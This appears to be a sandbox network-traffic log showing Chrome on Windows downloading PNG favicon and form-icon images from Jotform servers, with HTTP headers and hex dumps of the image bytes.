                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC886INData Raw: 33 34 64 66 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec bd 07 77 54 57 b6 fd bb 41 39 90 24 10 49 22 e7 60 a2 13 e0 dc b9 ef ff dd f7 be e7 7b 37 f6 ed 6e b7 db 36 b6 31 36 b6 49 26 e7 20 72 94 10 ca 12 bc f1 9b a7 b6 28 15 55 aa 53 92 c0 7d fb cc ea a1 81 1b 4a 55 67 cf bd f6 5a 73 c5 3d e3 ca 95 e7 cf 83 5f 46 c0 08 18 01 23 60 04 8c 40 a6 10 98 61 02 90 a9 fd f6 62 8d 80 11 30 02 46 c0 08 08 01 13 00 0b 82 11 30 02 46 c0 08 18 81 0c 22 60 02 90 c1 4d f7 92 8d 80 11 30 02 46 c0 08 98 00 58 06 8c 80 11 30 02 46 c0 08 64 10 01 13 80 0c 6e ba 97 6c 04 8c 80 11 30 02 46 c0 04 c0 32 60 04 8c 80 11 30 02 46 20 83 08 98 00 64 70
                                                                                                                                                                                                                                            Data Ascii: 34dfPNGIHDRxsRGB IDATx^wTWA9$I"`{7n616I& r(US}JUgZs=_F#`@ab0F0F"`M0FX0Fdnl0F2`0F dp
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1390INData Raw: 80 11 30 02 46 c0 08 18 81 0c 22 60 02 90 c1 4d f7 92 8d 80 11 30 02 46 c0 08 98 00 58 06 8c 80 11 30 02 46 c0 08 64 10 01 13 80 0c 6e ba 97 6c 04 8c 80 11 30 02 46 c0 04 c0 32 60 04 8c 80 11 30 02 46 20 83 08 98 00 64 70 d3 bd 64 23 60 04 8c 80 11 30 02 26 00 96 01 23 60 04 8c 80 11 30 02 19 44 c0 04 20 83 9b ee 25 1b 01 23 60 04 8c 80 11 30 01 b0 0c 18 01 23 60 04 8c 80 11 c8 20 02 26 00 19 dc 74 2f d9 08 18 01 23 60 04 8c 80 09 80 65 c0 08 18 01 23 60 04 8c 40 06 11 30 01 c8 e0 a6 7b c9 46 c0 08 18 01 23 60 04 4c 00 2c 03 46 c0 08 18 01 23 60 04 32 88 80 09 40 06 37 dd 4b 36 02 46 c0 08 18 01 23 60 02 60 19 30 02 46 c0 08 18 01 23 90 41 04 4c 00 32 b8 e9 5e b2 11 30 02 46 c0 08 18 01 13 00 cb 80 11 30 02 46 c0 08 18 81 0c 22 60 02 90 c1 4d f7 92 8d 80
                                                                                                                                                                                                                                            Data Ascii: 0F"`M0FX0Fdnl0F2`0F dpd#`0&#`0D %#`0#` &t/#`e#`@0{F#`L,F#`2@7K6F#``0F#AL2^0F0F"`M
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1390INData Raw: 41 04 4c 00 32 b8 e9 5e b2 11 30 02 46 c0 08 18 01 13 00 cb 80 11 30 02 46 c0 08 18 81 0c 22 60 02 90 c1 4d f7 92 8d 80 11 30 02 46 c0 08 98 00 58 06 8c 80 11 30 02 46 c0 08 64 10 01 13 80 0c 6e ba 97 6c 04 8c 80 11 30 02 46 c0 04 c0 32 60 04 8c 80 11 30 02 46 20 83 08 98 00 64 70 d3 bd 64 23 60 04 8c 80 11 30 02 26 00 96 01 23 60 04 8c 80 11 30 02 19 44 c0 04 20 83 9b ee 25 1b 01 23 60 04 8c 80 11 30 01 b0 0c 18 01 23 60 04 8c 80 11 c8 20 02 26 00 19 dc 74 2f d9 08 18 01 23 60 04 8c 80 09 80 65 c0 08 18 01 23 60 04 8c 40 06 11 30 01 c8 e0 a6 7b c9 46 c0 08 18 01 23 60 04 4c 00 2c 03 46 c0 08 18 01 23 60 04 32 88 80 09 40 06 37 dd 4b 36 02 46 c0 08 18 01 23 60 02 60 19 30 02 46 c0 08 18 01 23 90 41 04 4c 00 32 b8 e9 5e b2 11 30 02 46 c0 08 18 01 13 00 cb
                                                                                                                                                                                                                                            Data Ascii: AL2^0F0F"`M0FX0Fdnl0F2`0F dpd#`0&#`0D %#`0#` &t/#`e#`@0{F#`L,F#`2@7K6F#``0F#AL2^0F
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1390INData Raw: 5c d4 d6 84 fa ba 7a c9 6e c4 2a 1f a7 4a be 33 ae 05 d9 d3 39 c9 c9 1f eb e1 bc 54 f3 e7 cc 2a 11 80 67 cf 46 c3 e8 e8 b3 f0 6c 74 54 df 3b c2 39 19 1d 11 46 23 c3 b9 3f 8b e0 35 9d fb 13 95 16 38 70 9e c0 9e 67 e6 f9 a3 b2 7e f6 ec b9 ce f1 f0 c8 48 18 1a 1c 9c d6 7d 28 b6 16 94 73 94 c9 78 66 93 e7 4c de 9d c8 d3 50 18 e8 ef 97 2c 4f a4 54 59 47 3c fb 51 0f 8c c9 55 ee 2c 08 ef 1c ce d3 81 6d dc fb 88 25 32 31 76 0e 86 92 73 c0 f9 2b 74 58 e2 77 f3 fe 42 bd c5 67 ce 98 99 42 61 e4 ce bb 74 6e fc 91 9c 8d 86 d1 91 e4 cf 4a e4 39 df c0 f1 5c c2 b3 a6 5a e7 45 7b 53 f5 82 38 4f 84 dd 33 48 2d b2 2e bb 30 1a 9e 8d 3e d3 b3 44 9d c4 7f bf 8e 57 c4 b6 be a1 21 27 e7 c9 f3 73 de fa fb fb 25 db 3c 53 a5 af 31 bb 88 ad a9 a9 d6 59 87 e0 47 3d 12 75 6e be de ad
                                                                                                                                                                                                                                            Data Ascii: \zn*J39T*gFltT;9F#?58pg~H}(sxfLP,OTYG<QU,m%21vs+tXwBgBatnJ9\ZE{S8O3H-.0>DW!'s%<S1YG=un
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1390INData Raw: 22 57 a4 a5 d1 8f 57 2e 5f 09 b7 6e de d4 f3 54 f2 dd e8 71 f6 6c 41 5b 5b 58 b0 60 be e4 8d fd 23 ea d1 f3 e4 89 ce 0d 7b fe e8 d1 a3 29 93 e7 18 f6 47 67 22 cb cb 57 ac 08 4b 96 2e 11 d9 24 92 f8 f8 71 97 d6 70 e5 ca 15 7d 5f 3e d9 48 95 02 c8 f7 c8 1a 1a 1b a4 bc 30 ec 18 86 b9 fa 99 27 4f 71 ee 9c 39 5a 34 a1 8e da ba 84 65 cf 9a 3d 4b de 0d 71 67 8c 5e 54 1c 32 f0 78 31 a3 09 23 ea ea ee 0e 8f 1f 3d d2 03 3e 02 98 c7 8f 42 d7 e3 2e 19 0a de 5b 8a d1 63 40 97 b6 2f 0d db b7 6f 0f 9b 36 6f 0e 8b 17 2f d6 de de bb 77 2f 9c 3b 7b 36 1c 3e 7c 44 8a 01 e3 82 52 03 14 8c 1a bf b3 64 e9 52 bd 9f c3 99 9f ef ad 44 80 2a 79 2f 11 0f 88 4f 3c e8 91 00 f0 5c 28 38 b0 c5 e3 7c d5 2f be 17 23 76 fb f6 6d 09 c6 cd 1b 37 65 8c a3 c2 43 90 96 b6 b7 87 5d bb 76 86 f5
                                                                                                                                                                                                                                            Data Ascii: "WW._nTqlA[[X`#{)Gg"WK.$qp}_>H0'Oq9Z4e=Kqg^T2x1#=>B.[c@/o6o/w/;{6>|DRdRD*y/O<\(8|/#vm7eC]v
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1390INData Raw: 1c 8b 75 eb d7 87 7d ef ed 53 d4 13 c7 96 94 09 3a e5 f0 4f 3f 89 04 5c bb 76 4d fa 25 2d 01 89 04 00 6c 3a 96 2f 0b eb d6 af 0b 6f bc f1 86 f4 0b 8e f0 fd fb f7 a4 4f 7e fa f1 47 c9 2b 6b 9d ec 9a d8 07 1c 72 ec f1 ea d5 ab c2 d6 ad 5b c3 f2 95 2b a5 43 ef df bb 27 72 8e ae 3c 79 e2 c4 d8 19 8d fb 31 21 01 88 0c 3b e6 2e 31 fe 78 86 08 df f2 e5 cb c5 c4 51 d2 62 e3 55 33 55 35 a9 62 0e 2a ef d9 f8 f0 5c f6 29 be a2 1c 28 74 97 3b bc fc a9 2a e3 99 33 25 a0 8f 1f 3d 0e 17 2e 5e 0c 17 ce 5f 08 17 ce 9f d7 0f 86 a9 54 8e 0a a0 37 6c dc 18 7e fb bb df 86 f7 3f f8 20 ac 59 bb 46 5f 87 51 38 78 e0 60 f8 d3 9f fe 24 23 43 c8 0b a0 d8 6c 84 95 8d e6 47 21 c5 96 89 09 c0 8c 5c 45 78 f4 ea 30 42 90 1c 15 69 29 87 95 1c 2a c8 0d 84 a6 d4 8b 03 4f b8 8d 35 ea 70 8d
                                                                                                                                                                                                                                            Data Ascii: u}S:O?\vM%-l:/oO~G+kr[+C'r<y1!;.1xQbU3U5b*\)(t;*3%=.^_T7l~? YF_Q8x`$#ClG!\Ex0Bi)*O5p
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1390INData Raw: 6b e4 99 f1 ae e3 f3 f2 27 de 25 64 59 61 72 fd f4 24 e7 3f d7 f5 14 9f 1b f2 18 8d 3e 7a 8c 94 d3 ac 59 b3 55 dc 8b 9c f1 e2 f7 f9 7e 0c 2d c6 0e 8f 11 fd 10 eb 5d 8a ed a7 6a 74 e6 cd 4b a2 33 9b 13 39 e1 b9 30 7a d2 8d 3d 3d e1 f1 c3 47 d2 2b d4 8b e4 1a bf c7 e0 8c b9 6b c8 88 0a 09 73 05 8e 7c 2e 91 0d d5 fa 3c 7c a8 50 39 cf c5 d9 c3 9b bd 73 e7 ae 22 01 91 ec 4f 66 7f a2 e1 84 44 41 2e 13 03 bd 57 b5 64 e8 62 74 08 51 87 e3 c7 8f 87 13 3f ff 2c 3c 2e 5f be a4 bc 7d 9a ba 90 48 30 b0 6b c8 2f 9f 8f 3e 21 f2 8c de c6 d9 b9 7a ed 5a f8 ea 8b 2f c3 b1 63 c7 a4 53 f2 53 c3 69 d6 14 49 53 24 b4 db 77 ec 08 1b 37 6d 94 83 ce 1a a8 a5 38 7a e4 48 38 79 f2 a4 1c a5 ab 57 ae c8 f9 2c 5b 03 10 0f 95 0a a2 66 cf 16 e3 46 99 6d dc bc 29 2c 5f b6 4c 46 10 41 62
                                                                                                                                                                                                                                            Data Ascii: k'%dYar$?>zYU~-]jtK390z==G+ks|.<|P9s"OfDA.WdbtQ?,<._}H0k/>!zZ/cSSiIS$w7m8zH8yW,[fFm),_LFAb
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1390INData Raw: 01 43 04 a9 c3 40 21 67 9c 7b f4 00 91 b4 43 df 1f 52 54 62 ac 48 b7 a7 27 15 01 c0 51 64 3f 90 51 7e 17 a3 8d 5c dc bd 7d 27 19 fc 96 f7 42 b7 26 ad d9 89 f7 4f 2a 16 62 b4 68 f1 a2 b0 74 c9 52 75 16 b0 46 de c3 9a 2e 5d b8 98 18 63 c8 f8 c9 53 3a 4f 93 25 bf e0 41 4d 0e 5e 33 64 9f 48 5d 7b 7b 87 a2 da 6a fd 25 c5 f5 f4 a9 e4 fb fa d5 6b 0a 9f 7f ff dd 77 f2 da b1 6d 69 e6 26 c4 94 20 44 8d 28 c3 ee 37 77 cb 8e 92 ca a1 18 78 60 70 20 9c 3a 79 52 6b 01 23 8a 58 89 e4 a6 59 13 98 c4 36 43 a2 16 d4 e9 ec 7d ef 3d 39 e8 9c cd 24 c5 70 21 7c f5 65 42 2e 39 1f f9 9d 56 63 d1 a1 c2 39 00 b1 57 1e 96 88 e7 0f f3 67 53 59 00 21 41 31 97 fb f7 e5 99 e3 c9 5c bf 7e 3d dc bd 73 37 3c 7e fc 48 21 07 0a f9 88 0a c4 4a d3 d8 c6 17 53 00 b1 bd 4b 83 7b 18 34 53 57 1b
                                                                                                                                                                                                                                            Data Ascii: C@!g{CRTbH'Qd?Q~\}'B&O*bhtRuF.]cS:O%AM^3dH]{{j%kwmi& D(7wx`p :yRk#XY6C}=9$p!|eB.9Vc9WgSY!A1\~=s7<~H!JSK{4SW
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1390INData Raw: cd e1 ad b7 df 52 95 24 61 49 86 46 90 8b a1 a8 40 3d dc 57 28 c8 48 0a c2 e2 d4 a6 b2 2d 29 79 f3 f8 a3 41 8e a1 92 28 b4 f9 0a b1 dc e6 56 4a 00 c6 42 1f 71 86 a8 0a ae d3 10 80 05 ea 18 d8 b6 7d 5b 20 d7 85 90 de bf ff 40 87 24 e6 86 61 5d 69 08 40 29 c5 1b 0f 44 a9 7f 87 00 50 c0 48 18 89 0d e7 4f 52 32 84 db be fe ea 6b 1d 54 c2 c2 0f 1e dc 4f 45 00 22 25 2f c4 b8 14 01 80 7d 7f f9 f9 17 e1 cf ff f3 67 45 1b a6 42 00 f2 e5 a4 70 bd a5 08 00 06 9f 90 79 d2 32 f3 4c 8a 5f 53 dc 66 ce d4 94 33 0c cf 8f 3f fe 14 8e 1d 3d 1a ae 5c ba 3c d6 b6 93 26 44 3e 1d 04 80 b0 2a 73 13 62 6e 99 6a 5c f6 54 75 0a 27 4f 86 d3 a7 cf 84 f3 e7 ce a9 da 9b 82 2d 75 00 94 68 1f 8d b2 10 cf 46 be 6c 88 44 e6 fd bc 0e 02 40 2d 06 9e 1a 0a 8a b3 0e 01 68 6b 5b 28 85 4d db 16
                                                                                                                                                                                                                                            Data Ascii: R$aIF@=W(H-)yA(VJBq}[ @$a]i@)DPHOR2kTOE"%/}gEBpy2L_Sf3?=\<&D>*sbnj\Tu'O-uhFlD@-hk[(M
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC1390INData Raw: fa 97 f2 d0 c8 dc 2b 0a af 4e 65 f4 e7 ab 3c 4f 7c 76 29 02 40 51 29 91 1f bc 7b d6 a5 59 0d 6d 6d d2 19 cc e6 bf 7d e7 76 f8 ee c0 c1 70 ea d4 49 a5 a2 98 6c 47 84 b0 92 17 8a 92 19 23 ec 27 29 48 a2 5d 4c 51 a4 56 87 f0 f6 c1 6f 0f 2a 05 91 f4 c4 6f d2 40 32 f2 ab 74 0c 65 ad 0b 60 aa 04 20 d6 5f 51 4c 08 01 f8 fd 1f fe 10 de 7d f7 1d 75 5e 88 b8 9e 3b a7 d4 e2 df 3e fd 9b 48 f5 eb 20 00 f9 a9 0a 06 b6 ed d9 b7 2f ec db bb 57 c6 92 48 34 c6 99 28 1f 44 13 59 44 c6 48 4d a7 25 9a 38 0c 8c c9 45 b6 62 1a 15 6f 1a 1d f1 ed 81 03 49 c1 dc a3 47 0a cd 33 fe 7a ef 7b 7b 25 7f 33 67 56 a9 f5 96 28 0b 11 c6 38 f9 32 4d 37 c0 cb e4 b6 5d a9 00 be 1f 3b 0b 81 66 5e 0e 67 06 bd 45 dd 05 7f 42 a2 f3 d3 68 b1 f0 99 c8 d7 b2 15 cb 25 ff 7b f6 30 18 ab 43 69 0a 3a 08
                                                                                                                                                                                                                                            Data Ascii: +Ne<O|v)@Q){Ymm}vpIlG#')H]LQVo*o@2te` _QL}u^;>H /WH4(DYDHM%8EboIG3z{{%3gV(82M7];f^gEBh%{0Ci:


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            35192.168.2.1749738172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC613OUTGET /assets/img/favicons/favicon-2021-light.png HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC667INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:01 GMT
                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                            Content-Length: 934
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:31:13 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 220
                                                                                                                                                                                                                                            last-modified: Mon, 23 Dec 2024 15:02:40 GMT
                                                                                                                                                                                                                                            etag: "88bcf8b9693d101ed0f51d5fcbed4690"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            access-control-allow-headers: Origin, Content-Type, X-Auth-Token, X-Prototype-Version, X-Requested-With
                                                                                                                                                                                                                                            access-control-allow-methods: GET, POST, PATCH, PUT, DELETE, OPTIONS
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            access-control-expose-headers: Content-Length, X-JSON
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5d48e1b1835-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC702INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 90 00 00 00 90 08 03 00 00 00 d0 98 12 8a 00 00 00 c3 50 4c 54 45 ff ff ff ff 61 00 00 99 ff ff b6 29 0a 15 51 ff eb df ff b0 80 ff 75 20 10 9f ff cf ec ff a0 d8 ff ff fb f1 ff d2 79 29 32 67 ff c4 51 e1 e1 e9 a3 a7 be ef f9 ff ff f6 e4 ff ed c9 df f2 ff 40 b3 ff ff 7e 30 bf e5 ff 90 d3 ff 20 a6 ff ff c8 5f ff 9c 60 ff 88 40 ff bb 37 ff db 94 ff d6 87 ff bf 44 ff 6b 10 60 bf ff ff f1 d7 ff d7 bf ff ba 90 ff a6 70 80 cc ff 50 b9 ff d2 d3 de ff e4 af ff c4 9f 70 c6 ff f0 f0 f4 ff f5 ef ff e1 cf b3 b6 c9 a3 a7 bd ff e8 bc ff cd af 4f 57 82 19 23 5c ff 92 50 af df ff 9f d9 ff 30 ac ff c2 c5 d3 85 8a a8 84 8a a8 65 6d 92 ff ba 8f 39 41 72 ff cd 6c 3a d9 7d dd 00 00 02 9e 49 44 41 54 78 da ed d7 87 6e e2
                                                                                                                                                                                                                                            Data Ascii: PNGIHDRPLTEa)Qu y)2gQ@~0 _`@7Dk`pPpOW#\P0em9Arl:}IDATxn
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC232INData Raw: f4 23 f6 56 fc 4f 8a 1f 90 e6 a1 ea 78 4b bf 9c 4b 16 e1 61 d6 8d e3 e7 d9 04 bb 1e a9 8f cc 39 12 a5 44 1e c1 01 c1 91 88 ef 91 38 ca 1c 89 58 1e b1 df b4 e3 89 da 79 a1 05 22 10 4b d4 17 f7 c0 71 44 75 79 0f 1c 47 d4 97 f7 c0 71 44 35 79 0f 1c 43 54 c9 c0 03 c7 10 05 19 78 e0 18 a2 20 03 0f 1c 43 14 64 e0 81 63 88 ea 19 78 e0 38 a2 9e bc 07 8e 23 aa ca 7b e0 38 a2 40 de 03 c7 12 b5 c5 3d 78 4a 10 5d ed 5f eb 9e b4 07 8f 6e 7f df b1 b7 71 4f d8 83 af 09 a0 1f 48 10 0d a4 9f cd df f6 83 ee 90 50 bd 4a 9c c1 3d 04 ba 3b 75 bb 3d 02 48 26 fd 9b 52 af 7d 0f a1 96 b7 67 5b 2d d3 ae d6 e3 71 1d 96 65 59 96 65 59 96 65 59 d6 41 fd 01 64 55 43 e9 41 0e 87 b9 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                            Data Ascii: #VOxKKa9D8Xy"KqDuyGqD5yCTx Cdcx8#{8@=xJ]_nqOHPJ=;u=H&R}g[-qeYeYeYAdUCAIENDB`


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            36192.168.2.174974234.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:01 UTC874OUTGET /jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=BVGW99P1wnPlh67eKiG1PA&expires=1736510728&width=144&height=144 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC504INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:01 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC886INData Raw: 31 66 33 61 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 90 00 00 00 90 08 06 00 00 00 e7 46 e2 b8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 b4 65 58 49 66 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 56 00 00 00 1b 01 05 00 01 00 00 00 5e 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 66 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 06 00 00 90 07 00 04 00 00 00 30 32 31 30 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 90 00 00 00 03 a0 04 00 01 00 00 00 90 00 00 00 00 00 00 00 d6 c3 b9 fa 00 00 1e
                                                                                                                                                                                                                                            Data Ascii: 1f3aPNGIHDRFpHYseXIfII*V^(ifHH02100100
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: 1d 1d ed 9c 6f 3e 4f 24 12 06 cc 41 9c 59 50 40 28 14 e4 5c 63 13 19 99 99 64 66 66 22 c9 23 45 32 2c 1a 08 0c 0d 21 2b 0a 2e 97 d3 fa 2c 26 50 49 02 09 89 70 38 cc b9 a6 26 06 87 86 b8 62 e6 15 78 3c 5e e2 67 92 24 49 0c 0e 0c d2 d8 d4 48 30 10 64 f2 e4 c9 64 65 65 d1 d0 d0 40 5f 5f df 88 06 1b 86 41 6a 6a 2a 53 a6 4c a1 b5 b5 95 fe fe 7e 73 82 e8 06 6e 8f 9b fc 19 f9 e4 64 e7 a2 e9 1a 9d 1d 1d b4 b4 b4 d0 d7 3b fe 76 2e 49 12 99 59 99 64 64 64 d2 dd dd 4d 4b 73 f3 b8 03 63 00 39 39 39 64 64 64 d0 d6 d6 ca 85 f3 17 00 48 4a 4a 22 3b 27 07 5f 4f 0f 1d 1d 1d 23 ee d1 75 9d c4 c4 44 f2 f2 f2 e8 ec ea a2 ab b3 13 c0 6a 9b ac 28 c8 32 84 82 61 3a 3a 3b e9 ea ec 24 12 1d 78 00 55 51 c9 cd cb 25 35 35 15 c3 30 17 95 c1 81 41 5a 5b 5b f1 f9 7c 28 8a 32 b6 9e 86
                                                                                                                                                                                                                                            Data Ascii: o>O$AYP@(\cdff"#E2,!+.,&PIp8&bx<^g$IH0ddee@__Ajj*SL~snd;v.IYdddMKsc999dddHJJ";'_O#uDj(2a::;$xUQ%550AZ[[|(2
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: d8 be 83 fd fb f7 e3 76 b9 50 14 85 33 a7 4f f3 f8 d7 9e a0 64 49 09 67 cf 9c 01 4c 9b a5 a1 a1 91 4d 9b 36 31 38 30 80 aa aa bc f3 d6 db fc e8 3f 7e cc ea 5b 56 f3 da 2b af d2 d9 d9 89 1a dd a6 a6 cf 98 41 71 71 31 5b b7 6c 25 39 25 85 f9 f3 e7 71 a1 a5 c5 5c 1c 64 99 ed db b7 71 fd 0d d7 b3 fa e6 9b d9 be 6d 3b 6d ad ad e8 ba 4e 59 79 39 73 e6 ce e5 e9 9f fc 94 e6 73 e7 50 55 15 59 51 14 56 af be 99 dc 9c 1c 7e fb 9b df 72 f2 c4 09 64 59 c6 e9 74 e1 f1 7a 70 38 9d 68 91 88 25 9e f8 d9 19 3b 27 49 92 64 aa 31 fa a3 44 0d c8 f8 cf 24 59 42 56 64 eb 77 59 51 90 64 19 59 56 50 14 05 87 a2 58 86 ac 04 48 92 0c 18 18 9a 8e a1 47 7f c6 18 8a 2a ed ed 1d 6c 7c f9 65 66 cd 9e cd ed b7 df 61 6e a3 b1 ed 47 92 90 64 d9 9a f1 a6 dd 05 86 04 9a a6 a3 3a 54 dc 1e b7
                                                                                                                                                                                                                                            Data Ascii: vP3OdIgLM6180?~[V+Aqq1[l%9%q\dqm;mNYy9ssPUYQV~rdYtzp8h%;'Id1D$YBVdwYQdYVPXHG*l|efanGd:T
                                                                                                                                                                                                                                            2025-01-10 12:36:02 UTC1390INData Raw: 61 48 8f 46 92 24 2a 0f 55 72 e7 5d 77 73 f5 d5 ab 38 7a e4 08 ab 56 5d cd 80 7f 80 0f 0e 1c 30 9d 77 63 ee 89 35 6b fc 32 63 1b ba e5 37 8b d6 b3 af b7 97 bf fe e5 2f 7c 5c f5 31 0b 16 2d e4 f6 3b 6e a7 ae ae 8e da da 5a 73 10 75 dd dc 5e 65 89 c6 c6 46 5e 5a bf 81 60 28 c8 9a b5 6b c8 ca ce e6 e8 91 23 74 75 76 e1 f1 78 08 06 83 cc 9c 59 40 79 79 39 79 79 79 7c f7 fb 4f a1 69 11 f3 84 99 93 8d ae 1b 14 15 cf 63 d7 ce 9d 96 2d 3a 30 30 c0 d6 f7 b7 b0 fa e6 9b a9 ad ad a5 ea 68 d5 48 1b 13 50 3b 3b 3b 69 6b 6d 63 fe c2 05 a4 a5 a5 d1 d7 db 87 d3 e9 24 18 0c 52 57 5b cb c0 c0 00 49 49 89 0c 0d 0d da 9a 55 9f 04 1d 1d 4d d3 2e 69 7f 11 3d 0d f9 fb fd bc f0 a7 17 98 bf 60 21 9f ff c2 17 38 54 51 41 24 32 56 44 0e 87 03 03 83 ee ee 6e b6 6d db 46 28 1c e6 a9
                                                                                                                                                                                                                                            Data Ascii: aHF$*Ur]ws8zV]0wc5k2c7/|\1-;nZsu^eF^Z`(k#tuvxY@yy9yyy|Oic-:00hHP;;;ikmc$RW[IIUM.i=`!8TQA$2VDnmF(
